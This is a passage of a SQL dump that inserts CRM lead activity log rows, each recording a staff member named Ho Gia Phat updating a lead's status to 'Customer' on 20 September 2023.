(717, 83, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(718, 84, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(719, 85, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0);
INSERT INTO `tbllead_activity_log` (`id`, `leadid`, `description`, `additional_data`, `date`, `staffid`, `full_name`, `custom_activity`) VALUES
(720, 86, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(721, 87, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(722, 88, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(723, 89, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(724, 90, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(725, 91, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(726, 92, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(727, 93, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(728, 94, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(729, 96, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(730, 97, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(731, 98, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(732, 99, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(733, 100, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(734, 101, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(735, 102, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(736, 103, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(737, 104, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(738, 105, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(739, 106, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(740, 107, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(741, 108, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(742, 109, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(743, 110, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(744, 111, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(745, 112, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(746, 113, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(747, 114, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(748, 115, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(749, 116, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(750, 117, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(751, 118, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(752, 119, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(753, 120, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(754, 121, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(755, 122, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(756, 123, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(757, 125, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(758, 126, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(759, 128, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(760, 129, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(761, 130, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(762, 131, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(763, 132, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(764, 133, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(765, 134, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(766, 135, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(767, 136, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(768, 137, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(769, 138, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(770, 139, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(771, 140, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(772, 141, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(773, 142, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(774, 143, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(775, 144, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(776, 145, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(777, 146, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(778, 147, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(779, 148, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(780, 149, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(781, 150, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(782, 151, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(783, 152, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(784, 153, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(785, 154, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(786, 155, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(787, 156, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(788, 157, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(789, 158, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(790, 159, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(791, 160, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(792, 162, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(793, 163, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(794, 164, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(795, 165, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(796, 166, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(797, 167, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(798, 168, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(799, 169, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(800, 170, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(801, 172, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(802, 173, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(803, 174, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(804, 175, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(805, 176, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(806, 178, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(807, 179, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(808, 180, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(809, 181, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(810, 182, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(811, 183, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(812, 184, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(813, 185, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(814, 186, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(815, 187, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(816, 188, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(817, 189, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(818, 190, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(819, 192, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(820, 193, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(821, 194, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(822, 195, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(823, 196, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(824, 197, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(825, 198, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(826, 199, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(827, 200, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(828, 201, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(829, 202, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(830, 203, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(831, 204, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(832, 205, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(833, 206, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(834, 207, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(835, 208, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:15:\"KH Tiềm năng\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(836, 209, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(837, 210, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(838, 212, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
(839, 213, 'not_lead_activity_status_updated', 'a:3:{i:0;s:11:\"Ho Gia Phat\";i:1;s:22:\"Khách hàng Marketing\";i:2;s:8:\"Customer\";}', '2023-09-20 10:28:23', 1, 'Ho Gia Phat', 0),
